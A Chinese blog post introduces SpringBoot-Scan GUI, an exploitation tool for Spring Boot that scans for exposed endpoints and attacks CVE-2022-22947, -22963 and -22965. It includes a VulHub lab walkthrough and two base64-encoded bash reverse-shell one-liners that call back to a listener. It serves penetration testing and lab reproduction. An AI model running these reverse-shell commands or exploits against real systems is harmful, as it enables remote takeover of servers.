当前位置:首页网络安全SpringBoot Scan GUI | Spring Boot漏洞利用工具

SpringBoot Scan GUI | Spring Boot漏洞利用工具

SpringBoot Scan GUI简介

开源工具 SpringBoot-Scan 的GUI图形化版本

日常渗透过程中,经常会碰到Spring Boot搭建的微服务,于是就想做一个针对Spring Boot的开源渗透框架,主要用作扫描Spring Boot的敏感信息泄露端点,并可以直接测试Spring的相关高危漏洞。

于是,就写了这么一个工具:SpringBoot-Scan 【简称:“SB-Scan”(错乱】

后期将加入更多漏洞利用内置模块(各位师傅能不能赏个Star嘛~码代码挺辛苦的哈哈)

我还整理了一篇SpringBoot的相关渗透姿势在我的个人博客,欢迎各位师傅前来交流哈哈:https://blog.zgsec.cn/index.php/archives/129/

特色

  •  由 13exp 师傅友情制作GUI图形化版本
  •  添加支持CVE-2022-22947 (Spring Cloud Gateway SpELRCE)
  •  添加支持CVE-2022-22963 (Spring Cloud Function SpEL RCE)
  •  添加支持CVE-2022-22965 (Spring Core RCE)
  •  命令执行漏洞式支持交互式执行命令
  •  验证代理是否存活
  •  支持使用HTTP/HTTPS代理所有流量
  •  随机User-Agent请求头
  •  解决SSL证书问题 (自签名证书请改成 http:// 即可)
  •  智能识别目标地址 (example.com 和http://example.com/ 以及http://example.com 都不会报错)
SpringBoot Scan GUI | Spring Boot漏洞利用工具

注意:本工具内置相关漏洞的Exp,杀软报毒属于正常现象!

Windows使用

python3 SpringBoot-Scan-GUI.py

也可以直接下载执行release打包好的exe程序

Linux使用

python3 SpringBoot-Scan-GUI-Linux.py

或者使用 wine 来执行:

sudo wine SpringBoot-Scan-GUI.exe

VulHub 漏洞测试环境搭建

git clone https://github.com/vulhub/vulhub.git

安装Docker环境

sudo apt-get install docker.io
sudo apt install docker-compose

搭建CVE-2022-22965

cd /vulhub/CVE-2022-22965
sudo docker-compose up -d

搭建CVE-2022-22963

cd /vulhub/CVE-2022-22963
sudo docker-compose up -d

搭建CVE-2022-22947

cd /vulhub/CVE-2022-22947
sudo docker-compose up -d

如果报错,自行修改 .yml 文件中映射的端口号

漏洞复现演示

一、CVE-2022-22965

VulHub 环境复现

SpringBoot Scan GUI | Spring Boot漏洞利用工具
SpringBoot Scan GUI | Spring Boot漏洞利用工具
SpringBoot Scan GUI | Spring Boot漏洞利用工具

内置shell 

SpringBoot Scan GUI | Spring Boot漏洞利用工具

aabysszg-shell 

SpringBoot Scan GUI | Spring Boot漏洞利用工具

13exp-shell

SpringBoot Scan GUI | Spring Boot漏洞利用工具

春秋云境 环境复现

SpringBoot Scan GUI | Spring Boot漏洞利用工具

内置shell 

SpringBoot Scan GUI | Spring Boot漏洞利用工具

13exp-shell 

SpringBoot Scan GUI | Spring Boot漏洞利用工具

aabysszg-shell  

SpringBoot Scan GUI | Spring Boot漏洞利用工具
SpringBoot Scan GUI | Spring Boot漏洞利用工具

二、CVE-2022-22963

VulHub 环境复现

准备反弹shell:

bash -c {echo,YmFzaCAtaSA+JiAvZGV2L3RjcC8xOTIuMTY4LjAuMTA1Lzg4ODggMD4mMQ==}|{base64,-d}|{bash,-i} || (Base64)

编码内容→ bash -i >& /dev/tcp/192.168.0.105/8888 0>&1

Kali监听对应端口: 

SpringBoot Scan GUI | Spring Boot漏洞利用工具

漏洞利用  

SpringBoot Scan GUI | Spring Boot漏洞利用工具
SpringBoot Scan GUI | Spring Boot漏洞利用工具

春秋云境 环境复现

注:云境反弹shell需使用公网服务器

服务器监听 

SpringBoot Scan GUI | Spring Boot漏洞利用工具
SpringBoot Scan GUI | Spring Boot漏洞利用工具

SpringBoot Scan GUI | Spring Boot漏洞利用工具

三、CVE-2022-22947

VulHub 环境复现

同样准备反弹shell

bash -c {echo,YmFzaCAtaSA+JiAvZGV2L3RjcC8xOTIuMTY4LjAuMTA1Lzg4ODkgMD4mMQ==}|{base64,-d}|{bash,-i} || (Base64)

编码内容→ bash -i >& /dev/tcp/192.168.0.105/8889 0>&1

kali监听对应端口: 

SpringBoot Scan GUI | Spring Boot漏洞利用工具

漏洞利用  

SpringBoot Scan GUI | Spring Boot漏洞利用工具
SpringBoot Scan GUI | Spring Boot漏洞利用工具

春秋云境 环境复现

SpringBoot Scan GUI | Spring Boot漏洞利用工具
SpringBoot Scan GUI | Spring Boot漏洞利用工具

项目地址

github.com/AabyssZG/SpringBoot-Scan

github.com/13exp/SpringBoot-Scan-GUI

温馨提示:

文章标题:SpringBoot Scan GUI | Spring Boot漏洞利用工具

文章链接:https://www.cutrui.cn/740.html

更新时间:2023年02月24日

声明:本站所有文章,如无特殊说明或标注,均为本站原创发布。任何个人或组织,在未征得本站同意时,禁止复制、盗用、采集、发布本站内容到任何网站、书籍等各类媒体平台。如若本站内容侵犯了原著者的合法权益,可联系我们进行处理。

给TA打赏
共{{data.count}}人
人已打赏
网络安全黑客工具黑客技术

BypassAvTool 源码免杀辅助工具

2023-2-23 21:14:15

网络安全黑客工具

ADRecon:一款功能强大的活动目录安全研究与信息收集工具

2023-2-28 19:29:22

0 条回复 A文章作者 M管理员
    暂无讨论,说说你的看法吧
个人中心
购物车
优惠劵
今日签到
有新私信 私信列表
搜索

你有新的私信

请务必要查看您的私信哟~~